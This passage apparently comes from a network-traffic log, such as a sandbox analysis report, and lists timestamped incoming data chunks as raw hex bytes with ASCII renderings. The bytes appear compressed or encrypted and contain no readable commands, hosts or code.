c0 4b 50 9f 9d c6 24 89 e0 4e 09 2f bb 62 22 e7 ba 39 4c 65 bd 6e 02 4e c0 ac e9 e5 eb b3 96 cb 08 ec 4d 95 8b 3e f0 b3 75 39 a4 d4 f3 3a 28 95 e3
                                                                              Data Ascii: Ab!0uym{&E6yRxE^/f^2{_v]qB1q*L)[T["!V-~D(o$;\/(+<A>j ,R)qR`%_f5uwp]`7KU 1!`-BK^t-?QKP$N/b"9LenNM>u9:(
                                                                              2023-10-26 07:45:59 UTC8103INData Raw: ff b6 b8 cb 5a b7 21 5a bc 35 c5 21 cb fb 73 cd 31 d4 ab a8 e8 a6 43 9d 79 70 6b d7 c4 6b 2d 20 06 b8 c5 09 fa bc c0 e9 0b 01 b0 aa 4d 09 4a ca 74 84 aa e6 d3 29 e7 66 bb 5f 2d 42 07 a4 8a 84 12 d2 ea 12 3f e2 54 85 e7 10 a8 23 e5 dd cc 7b c5 a5 bf f2 a1 92 ae dd 0e 68 c4 c9 da a9 6b d7 94 d6 bd 7c a8 cb 5e b6 c9 dc b3 c9 57 52 97 bd 53 5b 8b c7 78 19 ef d7 6b 99 f1 9e f8 cf af ba b3 1a 07 42 6b 55 96 a8 fd 21 0e 3f 75 83 ae 65 5b be c1 a5 63 4d 99 83 ce 74 de 42 f9 db 71 25 44 ef bf 29 83 6a c5 e2 8b 3b 4e ab 62 04 01 75 84 b9 c1 bf da cf 4d 4a 82 21 d1 c2 7e cd 73 c2 88 d9 42 e5 c5 a8 b5 89 c2 d7 fb c8 2d 1c c6 2f 89 eb ba 46 7b 81 25 5c 9b 6b 7f 29 f2 53 ec 99 1b 1a ca 42 ac ff 7f b3 25 ef a5 d7 a6 9e 5f c5 85 ff 64 a9 bc 02 5a f8 dc 27 d9 d6 e6 51 ea
                                                                              Data Ascii: Z!Z5!s1Cypkk- MJt)f_-B?T#{hk|^WRS[xkBkU!?ue[cMtBq%D)j;NbuMJ!~sB-/F{%\k)SB%_dZ'Q
                                                                              2023-10-26 07:45:59 UTC8119INData Raw: ce ae 55 0b 5a 60 29 eb 1b 13 f5 31 4c 09 ce 6d da 94 0e a2 37 47 5e a4 b3 72 62 60 96 1b 93 b1 a5 5c 51 c4 ff a6 1f 42 fd 19 3c 1e 7e ae 36 a8 5b 62 2c 3f 9e c3 b7 32 81 ca 10 94 d1 d4 73 bc e1 29 ed 49 c0 7f 85 5d ac 1b 45 b1 2e 8e ee 6b 9c 31 5a de 39 af 91 aa c5 84 2b 8d 0c e6 dc 9a c8 ad be fd 4c d6 75 f6 22 65 fd 06 fb ea 99 a7 7a 17 bb 56 7d 39 91 a5 9e ee fb b8 75 3f 85 05 5c 07 e4 ab 75 17 72 2e ee 1a 47 ac 22 77 ce 20 c7 65 31 fb 13 73 22 c9 db 57 5b a3 b5 fb ce 61 48 c2 5e 69 b2 3a 99 4a 0e ff 21 01 c9 16 a1 49 cf db d6 89 df 4c d1 e3 86 62 31 d0 29 cb 45 18 27 64 50 a5 07 12 3b ce 67 4f ec da b4 fe d7 ff 1a 95 7a 16 a3 f1 36 43 17 c6 88 29 70 a5 f4 de 75 70 3c 1b 90 0d 4c 61 33 d0 27 65 18 44 61 56 ed 90 33 2e 3e eb db bb 72 17 3f 53 34 23 f5
                                                                              Data Ascii: UZ`)1Lm7G^rb`\QB<~6[b,?2s)I]E.k1Z9+Lu"ezV}9u?\ur.G"w e1s"W[aH^i:J!ILb1)E'dP;gOz6C)pup<La3'eDaV3.>r?S4#
                                                                              2023-10-26 07:45:59 UTC8135INData Raw: e2 b8 5e a2 25 92 f1 be 2f b2 69 84 cb 88 8c da f3 95 5d 39 01 e5 09 6f ad 64 ca cf 72 89 8b 13 5f 6e 9a 54 cd 50 35 5f 3f 69 d2 2a ff 34 46 f8 12 4b ae dc 25 f1 58 80 e9 f6 8e 9d 56 b0 58 4d 63 5c 1f 6e 25 c3 df 45 ce 2c c7 c9 05 ce f9 ef a6 8a 16 21 de 0b f9 e6 7e db eb 56 2f 09 ff e2 df f3 c1 a5 d4 27 d1 c4 2f 98 33 0a 8a 43 37 09 64 0f b7 02 75 66 bb cc 86 db 22 c4 9c 6a 32 06 d6 4a 73 5d 0b 94 d7 ee d2 9d e2 b5 79 ae c5 e4 98 14 cc a4 f4 2f 33 02 d5 b9 16 c8 92 d4 f5 e9 4f d3 aa f2 f2 4e ef 61 51 c3 8a 2e cf 43 29 ef 4d 27 57 89 f5 ff ce 2c 9d fd 96 bc 4b e7 a3 ff d3 bb 89 db 20 fd f6 a5 8b ad f9 00 89 21 d7 fb a0 14 31 80 58 6b 4e b9 96 d7 fa 8d 40 2e dd f0 66 79 16 89 cf e2 19 9d d3 10 e3 65 ca e6 34 3b 58 58 01 2c c6 6f 48 01 da 72 e6 c9 cf 5f 65
                                                                              Data Ascii: ^%/i]9odr_nTP5_?i*4FK%XVXMc\n%E,!~V/'/3C7duf"j2Js]y/3ONaQ.C)M'W,K !1XkN@.fye4;XX,oHr_e
                                                                              2023-10-26 07:45:59 UTC8151INData Raw: cb 3f fc 06 b4 ec 4c 55 16 0d 7b 7a 62 76 88 d4 bc 5a 5f 74 ca c9 55 40 df e2 10 e1 5d 59 2f bb 34 c2 ab ac 95 8b cd 5c 8b 25 57 9a 5a 7f b8 79 8b 07 bf b3 44 17 e2 ef 48 f9 4e 9d fd 29 f0 07 26 af c5 e8 fb 65 8e 82 0b c7 55 72 b2 5e ca b8 8e e5 ae 8a f2 4b e9 b7 4a bc f2 b1 e7 f0 4f b9 7e 7e cd 95 ce d0 ae 97 bc f9 c2 c0 06 2a c6 13 eb ae 99 c6 e9 c4 ce 7f 24 df ef 14 a3 5b c7 4b 9b 82 af 31 c2 5f 7c 65 e4 3f e8 46 5b a8 c7 f5 fa e6 f3 d3 09 a0 0b f4 58 71 08 2f e8 0a e2 0e fd 79 da 61 09 0c 24 2e 8b cd 5f 34 31 ba e3 a2 27 0a 79 46 51 07 76 59 38 7d 52 59 8e 03 d7 ec f7 b4 bc b5 e1 29 39 3e cf 2a 3c 0a 09 b3 2f 73 5f 71 4b c4 29 04 fd 90 28 c7 09 a0 01 4f 5d ff 1e 8f 29 29 3a 88 c9 71 c2 94 e4 79 86 3f 66 5d 32 99 09 15 12 fe e6 30 1b ea 0c f9 dd 12 6c
                                                                              Data Ascii: ?LU{zbvZ_tU@]Y/4\%WZyDHN)&eUr^KJO~~*$[K1_|e?F[Xq/ya$._41'yFQvY8}RY)9>*</s_qK)(O])):qy?f]20l
                                                                              2023-10-26 07:45:59 UTC8167INData Raw: 49 19 6a 41 3b 16 e5 b6 42 09 4c 09 ee 3b 16 d2 31 df 87 69 e8 d9 d4 e2 c4 05 fc 4f c9 c6 db 7c 20 e1 17 d6 33 08 ad 49 c5 29 d2 ba 8b 8b 4f ba 8b cf 5f ac c8 b7 7b dd cc 02 29 ca 3f 0e 6b de 43 c9 5e 6c c5 c2 0c 4b 21 a8 29 9d 41 2e e8 7f f9 59 ca f7 2a 45 d0 a8 30 b5 a9 39 9f 70 58 8b f8 6d aa df 5c 36 7a 5c 7e 9c d7 e7 d5 6c b3 25 ce 80 96 bf 81 cd cf 3a b9 79 c5 ce 01 ac a4 b1 45 8a ca 58 d4 77 f8 8c 02 81 e9 77 58 9a 39 7f 09 a4 f5 ec 93 2d 09 ca 76 44 67 49 35 fc aa 29 cb 2f e3 60 1c 09 fa c9 05 a6 45 16 89 66 29 5a a3 a5 de 4a b5 a7 fd 96 ff 4a 3f a3 ba 4b bf 64 1c ed 48 18 a9 33 0a 2b fa 17 18 63 73 ff 5f e2 f9 8b 59 56 48 5d 19 66 45 8f 09 44 09 0c 9c fc d3 9d 65 2b 13 f3 fb 98 18 04 97 c5 c8 25 fd b9 ca e9 7f ca e5 4a ae 32 75 cf 79 6c 09 09 fb
                                                                              Data Ascii: IjA;BL;1iO| 3I)O_{)?kC^lK!)A.Y*E09pXm\6z\~l%:yEXwwX9-vDgI5)/`Ef)ZJJ?KdH3+cs_YVH]fEDe+%J2uyl
                                                                              2023-10-26 07:45:59 UTC8183INData Raw: 27 46 f8 40 b2 f7 ee 16 a9 9f 6d 52 a0 a2 05 f2 03 12 c2 2e f7 2e b0 c9 58 d4 58 51 c7 23 7b 12 09 ff fb 28 99 f3 9c 71 6d d8 2b 72 f9 c6 76 c4 c4 40 49 b2 4a a6 57 f3 3d 97 ee 99 16 61 fc 22 65 c1 41 30 10 49 29 73 92 eb 72 e9 f6 fd e5 56 85 4d 21 ee a9 7a d7 b6 28 5a fe 74 e5 eb 52 93 ab b6 8e 59 85 93 e9 b3 8f 31 d6 ba 52 21 ef 1d 38 96 f6 77 d0 d2 01 c1 f4 77 cb 62 37 ce 78 9c fe 48 b4 2f 0f c9 29 f4 fe 5d e9 5f 70 e6 4a f3 ae 8b 6f 4e f1 ae 2b fc 63 b2 01 92 4a ff 42 f0 ba 76 77 fc 34 62 f3 10 55 9c b0 a2 07 5d 59 4b af ff 14 ed fd 2b 2d 15 52 45 88 29 5d 03 cd 82 ba 82 52 7c d9 53 c2 40 fe 89 e4 ef fb 62 75 88 73 91 1c 08 25 7d 94 60 52 c3 50 5b 20 f5 44 09 2b 97 56 dc cd b5 3f 29 80 02 c2 f0 77 71 5d 09 f1 88 51 9c 49 d8 57 95 b2 8c 55 4c 87 95 df
                                                                              Data Ascii: 'F@mR..XXQ#{(qm+rv@IJW=a"eA0I)srVM!z(ZtRY1R!8wwb7xH/)]_pJoN+cJBvw4bU]YK+-RE)]R|S@bus%}`RP[ D+V?)wq]QIWUL
                                                                              2023-10-26 07:45:59 UTC8199INData Raw: 78 45 28 20 d4 fb f6 ea 77 f7 33 6d 20 f2 49 c2 53 4f ac fd a4 75 cc 98 a2 4c 25 8b 2a 0b 6f ee c4 95 75 89 f9 d5 46 1d 12 51 8f 04 10 29 bf 69 11 57 58 32 5b 59 75 67 ef 14 6d 89 97 ea 3c cc 09 4f e7 b9 59 da 3b d7 65 40 26 dc c2 cf 01 56 22 5a 8b 03 5f 98 c5 c0 08 9d 16 61 15 4d 31 e7 2c d3 32 d5 4d da 4f 73 d0 fa e9 b5 fc fe 71 63 28 61 55 25 2e ce 72 5e 94 4b fe f2 b4 d5 fb c4 01 f2 0b 18 71 f2 49 50 a5 b4 25 70 c7 88 9d c5 eb b1 72 c0 c2 2f dd dc 3b 99 26 3b 84 1d c2 13 f9 d5 ee 7e 49 0d 52 84 ea f0 f2 9f da f7 f9 fa 7b 84 62 0e ff 79 eb 62 2b 0b 54 81 6b e6 f9 4a 0e f3 c7 87 29 4d 0a 0e 4b e6 fa 70 45 09 83 0a cd 0d 66 73 9f 5c 92 64 0f ee 9f 80 5f e9 2a 89 3a ff e5 a8 9f 2b 6d 55 94 55 95 f7 89 7b dd 16 47 9f 5c 90 70 bf e1 25 6d 47 d1 88 c9 df 04
                                                                              Data Ascii: xE( w3m ISOuL%*ouFQ)iWX2[Yugm<OY;e@&V"Z_aM1,2MOsqc(aU%.r^KqIP%pr/;&;~IR{byb+TkJ)MKpEfs\d_*:+mUU{G\p%mG
                                                                              2023-10-26 07:45:59 UTC8215INData Raw: 92 f4 fe 9d 09 63 4c 4b b1 ad 32 fe 4e c7 e2 99 75 89 1d 54 23 2c 55 c9 73 ab a5 db d8 25 31 b1 c4 09 2f 8c 3a 4d 2d 63 11 14 54 97 a9 bb ff 16 7f 9e a0 c4 eb ef e9 23 3c ef de fa 3d 4f 40 59 13 ff e3 07 04 84 a4 e9 05 00 aa 42 cf 7f 70 4b f3 c1 96 c2 60 9a ba 53 a0 ce 81 65 c0 18 b6 9e aa 69 4d 98 b3 00 55 df 5a b7 a3 79 d3 51 18 61 8e 45 38 e3 42 00 3f c5 fe ff f6 6e 1b 67 97 f2 32 0e 51 5c 04 1d 46 eb ac 6d 1c bb cc a3 19 57 a4 89 80 08 30 c2 e1 5c ec ff 18 fd 1c 96 21 68 c0 30 86 0d ac f1 dd 6c de 54 00 22 f4 d7 ff a7 91 db 14 88 f8 e3 41 11 c3 bc c2 d4 52 e0 90 82 84 38 58 07 1c bf bc 78 60 4c 2b a5 af 36 c6 3c be 52 6c 05 03 9b ae 41 0b e8 7a 3f 08 50 88 25 1b 5c 65 4b d0 60 30 9c 43 7f 07 4a c6 0c e0 1f 1c 80 18 70 ad 70 60 30 a9 4a 18 fe 9d bf 63
                                                                              Data Ascii: cLK2NuT#,Us%1/:M-cT#<=O@YBpK`SeiMUZyQaE8B?ng2Q\FmW0\!h0lT"AR8Xx`L+6<RlAz?P%\eK`0CJpp`0Jc
                                                                              2023-10-26 07:45:59 UTC8231INData Raw: c9 8b 0e 55 51 e8 73 d1 63 37 7f ce 60 20 30 4e e1 ba 78 69 06 b4 b1 65 3b ba a3 7a 89 3e dd 71 1b 69 7c 0e 50 21 39 9d 67 7a 80 34 24 6b 82 af 06 a4 12 bf e6 f9 2d 3c 24 f8 d2 f9 2a a6 fa 02 c7 e9 46 95 40 dd 59 fe 64 38 eb 2d fc 2f f7 3f 12 fa 9f 8d 40 02 94 07 e1 a4 97 76 eb 44 4a 08 70 5d 9d dd 34 48 a5 53 e9 dc dd a1 b2 e3 33 0e 04 2e 7a d0 0c 15 ce 34 4f ee 2d 5a 3e a2 c6 24 33 1e 7c 4c 1f db e4 0a 8e 19 8b 0e e6 a9 84 2d 9f c0 33 95 43 e0 00 26 ce 2c 0c 3e ea ff 70 7f 4c 37 cb 56 a0 22 e2 08 52 b4 67 e6 15 c0 ab 74 c9 8c f0 4e 14 5d 2e b5 0f 00 19 97 10 64 13 46 f3 e6 80 bb 08 ff 4e 56 ba 88 89 d3 22 25 19 08 f7 cf d6 ff 0c 0c 04 08 d7 3e f9 89 27 f5 cc f3 7c 48 30 20 d2 18 a8 17 e5 3a ff c9 04 06 a2 81 d0 17 ba 70 b0 93 2a ab e4 6c ed 00 b3 a5 db
                                                                              Data Ascii: UQsc7` 0Nxie;z>qi|P!9gz4$k-<$*F@Yd8-/?@vDJp]4HS3.z4O-Z>$3|L-3C&,>pL7V"RgtN].dFNV"%>'|H0 :p*l
                                                                              2023-10-26 07:45:59 UTC8247INData Raw: ae 9f 8e 5b fa 32 09 17 dd 47 50 90 eb d2 ba 17 18 b7 51 2f e2 fd b8 ea eb 10 96 2b 5a 55 32 17 5f 62 c0 f3 ce b5 a4 ea ca 9e 4b ef 32 8f fb 7f 79 5a 4b d6 9e eb 9c c7 36 01 d2 f7 68 94 ea c9 d5 38 ff ea 40 94 3d 44 c9 fa f8 b1 b4 ac 67 c2 44 2b 3b f7 ab 64 ce 8b 2a c3 78 63 4a cb be ce b4 25 c4 7f e7 77 2f 76 c6 2f f6 34 e5 c3 24 7e ac 16 83 44 03 3e d4 ca b4 12 c9 3f dd 6d 6f 61 57 e6 78 08 29 4e c9 a2 3d 92 84 8f aa 2d 59 7e 30 33 44 21 3e 96 18 c9 4c 0b 84 aa a2 dd 5b 5a ad 7f b1 fd ca 7e a3 d8 96 bb dc ed ea a4 78 25 e3 20 59 1e 6f a0 0b e9 d8 fc 37 a1 c9 e0 3b 13 9a bd de 93 ae f7 f2 2b e9 bf 2d c4 c2 a1 bf 3b ea 6c 68 7a 4d 69 e6 59 79 e3 42 e0 10 19 d4 38 5c b5 95 59 ff 8b 07 71 a8 4b 21 d1 13 45 01 3b d9 9c 93 d8 e4 eb d8 a4 89 53 c8 4a 5e af 75
                                                                              Data Ascii: [2GPQ/+ZU2_bK2yZK6h8@=DgD+;d*xcJ%w/v/4$~D>?moaWx)N=-Y~03D!>L[Z~x% Yo7;+-;lhzMiYyB8\YqK!E;SJ^u
                                                                              2023-10-26 07:45:59 UTC8263INData Raw: f0 82 21 80 ad 26 4a 77 8b 17 7b 03 8e f2 3f 16 a2 6f 93 be 65 49 56 0e a8 66 cb 17 ce 7c 8c 07 4f c1 af dc b3 e1 b4 5e 42 31 e3 7c fb eb d5 e1 2d e2 7a ec a7 b5 ed b8 c6 21 16 14 04 c0 71 cc d5 3d be 38 c3 21 4a 01 fe 72 4e a6 9a ad 75 4c af bd 41 f8 41 2b ad 6f 8a c6 82 4c 1c fa b6 1b 69 d0 86 bf f9 c0 40 81 08 e9 80 27 06 6f 91 41 45 2a 07 30 01 ed 62 20 75 d4 8c 52 5d 65 46 23 d7 2b 15 ac 0d a5 94 63 fd 3e cd 81 7e 91 f2 29 e9 02 ea 57 e5 0e 2d 58 15 a5 f2 b5 1d a3 fc 7f aa 4f 0b bc d7 14 17 48 cd 3c 4b ca 00 14 c8 78 73 e4 b6 67 42 15 5b aa 31 ef 21 c5 2b 97 65 65 cf fe 65 17 aa c5 f0 fa b2 c1 88 22 a7 14 e4 b7 db 18 14 c5 07 84 ce 01 31 c1 07 6e 74 49 16 b7 af c8 a2 ef b7 74 75 5a 7c 90 64 cb d8 d7 f7 bd 65 69 27 ec aa 0b ee 4c 09 f6 f5 0b 4e d4 14
                                                                              Data Ascii: !&Jw{?oeIVf|O^B1|-z!q=8!JrNuLAA+oLi@'oAE*0b uR]eF#+c>~)W-XOH<KxsgB[1!+eee"1ntItuZ|dei'LN
                                                                              2023-10-26 07:45:59 UTC8279INData Raw: 32 f5 36 c2 92 12 9d fb 96 98 5e ca 34 24 97 93 24 d4 ab bc 18 b1 03 27 02 20 75 fb 4c a5 74 25 c4 e0 bf fd bd ca c0 6f 45 c6 a6 93 da 0a 75 94 f7 b7 79 68 12 f7 ee 77 9d 34 ed fb a7 f0 5b e5 0b 6b f2 0a d2 56 bf 38 b4 8b 95 59 d8 64 ef eb dd 96 2b 28 ed c5 49 05 4c 89 6d fc 1d 52 5f f6 aa 5a 7e e7 67 29 f9 c5 7a 2b 23 a5 6c 4f 27 cb 20 67 c9 16 35 f3 83 94 90 02 f5 c2 5a 62 4b 75 c5 7e 09 f7 08 79 9a 69 fd 4e 38 ef 2b b6 1b 5b ed 78 96 0b 2e f9 65 7e a4 5b 62 31 2e ff 94 63 4b e5 ab cd 6f a7 4a e2 c5 72 fa 95 56 c4 7a dd 98 ee c1 e5 5b 03 66 6b 52 f9 3e ea 54 d4 21 2f 8b f7 3a 25 c2 0b d7 1e e9 38 cb 3f 70 8c d2 56 ee 65 b3 bc 5e 4e ae 34 97 ea 65 9f a9 9f 8b 4d 77 c3 f9 da e3 f6 a1 72 d6 e5 25 e5 66 a0 8f 4e d6 fe 34 88 2d 8f 7e d8 cd 02 09 ff e0 21 37
                                                                              Data Ascii: 26^4$$' uLt%oEuyhw4[kV8Yd+(ILmR_Z~g)z+#lO' g5ZbKu~yiN8+[x.e~[b1.cKoJrVz[fkR>T!/:%8?pVe^N4eMwr%fN4-~!7
                                                                              2023-10-26 07:45:59 UTC8295INData Raw: 98 8a 75 a8 1b 3b fe c0 1c 84 23 81 e7 13 c2 ef 8e 97 5f 64 08 b0 fd 21 4b c9 a8 23 a2 c2 57 b1 86 1a 34 b3 e9 13 d8 76 2d cb 92 48 8a 25 3e 7f 45 bd c9 7d 62 85 55 47 a4 12 20 09 73 d2 ff ec 02 5e 05 fb 2d 85 7f 28 6a e3 56 90 ea 45 b3 2b f2 84 8b 2d d5 ba 36 53 c3 a5 dc ac ad df 34 04 53 06 ab 3e f6 c8 a3 4f f6 06 4b 8d d8 60 86 0e 95 ec 3d a2 bd fd f8 85 95 3a 09 7f 6c 96 2b 09 c0 98 2d 5e b0 13 29 ee 2c d3 e3 a8 07 31 c6 97 5c 12 52 60 70 c3 41 25 33 09 77 e5 04 1a 4c 5c 7e bb e4 05 99 33 7c ed 96 f8 0d 2e 21 c8 92 e6 eb f2 3e d3 fa 73 96 35 e4 ba 69 54 3a bf 2d 2d 23 af 24 fd d5 00 d8 81 22 15 2e be bf 50 da 5f ed e7 70 7a 4f c1 a2 0f 8b c5 dd 46 e9 54 4d 98 f7 9e 47 25 7d 67 08 25 53 f8 25 6a 1b 49 7e c4 32 88 c9 f4 75 c5 42 a6 eb 17 f3 ca 37 25 c1
                                                                              Data Ascii: u;#_d!K#W4v-H%>E}bUG s^-(jVE+-6S4S>OK`=:l+-^),1\R`pA%3wL\~3|.!>s5iT:--#$".P_pzOFTMG%}g%S%jI~2uB7%
                                                                              2023-10-26 07:45:59 UTC8311INData Raw: 4c 33 63 65 ab 73 99 44 72 ed 76 e3 a5 ae e2 4f 91 01 a8 2e 1c c3 79 07 22 0e 90 53 f8 34 11 1e c6 5f 67 51 f8 e0 09 16 b9 12 5b 0c ae 38 58 09 09 06 55 1d 4a 60 a5 23 b8 4e 5a b5 67 3b a8 25 f4 bb e1 1a 3e f1 f1 3a dd f0 29 65 d6 fa df 17 07 4c 39 1e 41 d4 16 ff cb d3 4b fc c4 12 09 f3 ac 6a a1 e1 ff c6 11 c5 7e fd 46 92 dc 48 ca 43 80 13 ed 90 cf c9 3f e5 4e a3 21 c5 eb 88 49 07 f2 66 9a 4a e4 f6 04 4f fb 75 8e a4 01 80 97 44 bf 77 c2 9f 47 40 a5 fc d1 62 29 c6 d5 d3 82 bc 5a 32 a4 cd 99 72 78 2e 74 f9 f6 57 1e 31 f1 9c 01 e7 57 ce b6 5e 3f aa 64 61 35 dc aa c5 40 32 2f cd d5 1a 33 55 32 25 f1 37 a7 77 67 97 1d 29 f9 96 21 c0 ef cd 01 7e bd bc d2 30 3b 45 2b 11 95 dd ba 89 29 7b 5d 89 e8 7d 66 42 b5 80 e5 26 27 2e 0a d7 e2 cc d1 c9 99 8e 69 5f e2 1b d5
                                                                              Data Ascii: L3cesDrvO.y"S4_gQ[8XUJ`#NZg;%>:)eL9AKj~FHC?N!IfJOuDwG@b)Z2rx.tW1W^?da5@2/3U2%7wg)!~0;E+){]}fB&'.i_
                                                                              2023-10-26 07:45:59 UTC8327INData Raw: 41 70 2b 57 c0 cd fe 30 af 53 be e4 f8 b5 50 37 16 35 05 a3 b1 0b 1a 2f bf 91 ae 29 bb 9c 08 f5 01 f6 46 36 a1 05 b6 31 7c 28 2f 75 10 d4 ed 8e e3 73 49 aa 52 5c 7f 3c 00 1b 28 26 76 10 d2 e9 d7 55 84 9e 91 0e db 6f 48 d8 c5 f0 66 2d 52 01 58 46 18 b8 72 fd 84 5d 39 c0 68 34 3f de ff 30 03 9b 68 83 2c 0b bc 81 54 3e 2b b4 5a ad 38 49 26 50 6e 53 e6 ba 0e 3b 6d ec c4 01 16 55 c1 77 82 cc 59 48 ca 6f 80 16 d5 e5 93 5f 2d d1 d8 ac 8f dc ff 01 7b f5 e2 f3 62 74 24 b0 14 34 cb 5e b6 e4 06 e0 22 2c 32 ce 16 06 14 af db c8 c4 bc b3 5f 10 c2 13 95 d3 ef 99 a8 b1 94 2c 90 7b 80 94 75 ba be 6a e4 da 71 21 e0 6b 62 4b d1 c6 1f 90 c2 a1 3b c0 08 28 5d 84 7c bd 1d 4b c9 7a 14 7b ac 03 06 6b e1 14 86 fa 22 7a 08 e0 ae 34 cf d7 86 40 44 3a 3d 5c 03 c5 60 40 44 05 34 e7
                                                                              Data Ascii: Ap+W0SP75/)F61|(/usIR\<(&vUoHf-RXFr]9h4?0h,T>+Z8I&PnS;mUwYHo_-{bt$4^",2_,{ujq!kbK;(]|Kz{k"z4@D:=\`@D4
                                                                              2023-10-26 07:45:59 UTC8343INData Raw: 91 72 c8 77 e4 06 ad 88 8a 0b 08 65 ae 32 68 b3 98 08 36 ca 43 99 23 3b 94 7c 38 ca 81 08 62 b6 13 b1 c8 bb 4c 08 f0 9e 78 c5 f5 32 08 e6 d3 38 14 eb 08 ca 68 38 65 6d 32 08 90 39 95 1c 5e 21 91 9a 91 63 cb 96 53 68 14 9b 08 c8 aa e4 af 72 a4 4e c8 53 a9 08 5f f2 88 f7 ab 57 34 62 12 44 2b 37 ae b2 cf d0 17 a1 31 37 3a f3 7c 81 c4 4e 80 28 3e bf 2c c4 8a 70 5d 17 80 fb d2 ea 8a 23 85 01 33 ef f7 f4 4f aa 8a ef 96 fc a7 25 16 54 85 70 03 12 9f f1 a7 e4 11 ef 8e 0d 12 21 14 ee f6 e6 8b d7 88 f5 1e 44 72 5b cb 4f 3e ac 20 a5 ff 32 25 c0 3a 57 de 9d c2 21 7e f7 2e 3c 7a d6 0c f3 04 41 fc 10 4b 9c a9 13 9e d7 c7 64 e4 ef 8e 81 d3 31 57 8a 1e 45 d9 ff 3e 2e 4a b9 cd 8c 1e b2 eb ec 5a 12 4c 89 13 ea f3 ee 09 40 b7 74 57 9e cf 4f 3b ed ce 91 37 2d 09 76 3f 5e bf
                                                                              Data Ascii: rwe2h6C#;|8bLx28h8em29^!cShrNS_W4bD+717:|N(>,p]#3O%Tp!Dr[O> 2%:W!~.<zAKd1WE>.JZL@tWO;7-v?^
                                                                              2023-10-26 07:45:59 UTC8359INData Raw: eb f6 4d 2e c3 46 e9 a9 9b fd 67 e8 09 29 d3 04 05 c6 bb dd 77 31 fb 3a f2 b8 d2 e8 fd c9 0a 9a 0a fc 36 52 6a d1 5f dc f0 e9 9a b9 f7 e4 7b 28 e7 e8 34 00 68 47 1b fe 7e 52 54 5a 9f 57 3c 6e 95 ff 13 ff c0 56 54 5e 97 5d bc f5 97 5d b0 11 68 d2 38 dd 3f df fe 2d 36 2a bb 31 0b 50 54 cd 58 2e be 38 b6 33 82 0d ac 08 01 08 5c 55 81 43 68 79 b8 5f 47 d4 cb f5 19 9f 7d 50 6c f0 2e bf 74 35 ba ac 35 b2 ec 14 01 5c 68 be 95 8f 6b 57 49 59 f0 b4 5e 3a ff 5f 87 25 e7 fd 5a a0 d6 2d de 7f 4f 4c ae cf 2d 6a 7c 8a 1a f4 0a 03 4d ff 34 4e 98 fb d9 0e 7f f9 a5 e2 33 05 51 f4 0a 31 65 4c 50 59 0d 0e 5c 8e d6 a1 41 55 54 5d 7f fd ce e1 4c 89 d2 b2 5f ff f1 ed 5a 7d 74 29 5a 98 0d 10 64 28 ba 43 fc d0 1d 89 3c d0 78 84 a0 07 68 fb fa 3d 75 62 0f 72 ca cd 77 42 d8 8d bd
                                                                              Data Ascii: M.Fg)w1:6Rj_{(4hG~RTZW<nVT^]]h8?-6*1PTX.83\UChy_G}Pl.t55\hkWIY^:_%Z-OL-j|M4N3Q1eLPY\AUT]L_Z}t)Zd(C<xh=ubrwB
                                                                              2023-10-26 07:45:59 UTC8375INData Raw: 9c 0a c8 ca 2f 77 16 9c 8a db 7d 54 94 eb d7 e6 83 66 ea 8c f5 64 5e fc e9 52 92 85 46 e1 96 79 21 93 53 e1 af 9d 99 31 bc 7c 3a b5 a5 33 93 16 e4 99 6c 96 47 80 f2 e9 93 0b 65 10 dd 94 07 9f fb e8 22 41 90 1d 04 f2 0c 91 58 13 d8 b0 f1 a4 1f 5c 78 83 c9 fe d7 ee 26 4c f8 20 32 d8 a0 de 4e 11 a1 93 ce 67 23 5e f9 58 49 38 43 92 12 01 d3 ff 8d d9 7b a0 cd 8b 59 33 f9 d9 56 db ad 20 62 5e 79 fd 49 32 d9 7f 62 a3 f1 fe 45 ec 98 cc f3 43 78 2c c3 0d c4 ca a8 0c 5b e8 10 85 c6 0a 52 53 07 b1 63 1e 62 01 db 0b 5b 37 0b ea 3f b2 a2 05 9b e7 ca 7b 1c 01 5d 0b ff e6 59 9b 40 c1 30 cc ce 58 73 8e 9c d2 eb eb b7 56 69 12 6c 43 44 d0 01 2d 0b 66 7d 2b 82 ce 45 a2 6e 5d 56 0c 79 0e 68 85 c8 2a 04 ed ff 36 bf d1 ba 8f 06 db 9a 45 ff 73 54 e9 57 b1 77 01 7b e2 37 c2 41
                                                                              Data Ascii: /w}Tfd^RFy!S1|:3lGe"AX\x&L 2Ng#^XI8C{Y3V b^yI2bECx,[RScb[7?{]Y@0XsVilCD-f}+En]Vyh*6EsTWw{7A
                                                                              2023-10-26 07:45:59 UTC8391INData Raw: ab 8e 03 a0 51 68 dc 12 79 5d 72 23 05 59 24 0a ca 31 48 9b 2d 56 d5 5c 71 68 12 0b f6 5f 91 0f 52 ba 61 b8 04 a2 ff e0 90 2c 16 b2 eb 0b ae 87 eb c5 6c 22 0c 5a 5d d4 62 82 2d e0 f5 0d 5d d4 4a 81 ea 86 a0 32 77 81 0e f2 ee b7 fc 5c 00 c2 af f5 26 bb b5 a2 2d 5c 12 61 57 52 5f 3f 26 46 60 75 4d 63 da aa 14 19 4f 2c 89 4c 6a e6 0e 89 da 05 41 3e ae a5 94 96 48 c7 eb 76 9a ec 60 70 68 68 db c1 fc 6e 1f 65 cc e2 26 f7 48 d2 49 8f 83 3e 22 04 c8 7f dc e7 7e a4 34 e6 71 46 0f 83 45 01 e0 74 77 07 fb 1b 73 0e c5 29 24 8f 1d 0a ee 33 96 d3 aa 17 3c 72 a6 50 7e 6b 26 c8 56 b3 b3 e0 68 c2 e5 ee 75 1e 0b 60 a8 ff 6f 51 54 40 2b 51 b9 b4 00 3f 7f 6f 83 c1 ff 81 c9 0e ab 9f ee 5d c0 f1 ca b3 f5 23 fb ff f0 e9 4f 16 6e db 1c c7 84 58 10 a3 89 cb 59 b0 27 5c 06 c0 04
                                                                              Data Ascii: Qhy]r#Y$1H-V\qh_Ra,l"Z]b-]J2w\&-\aWR_?&F`uMcO,LjA>Hv`phhne&HI>"~4qFEtws)$3<rP~k&Vhu`oQT@+Q?o]#OnXY'\
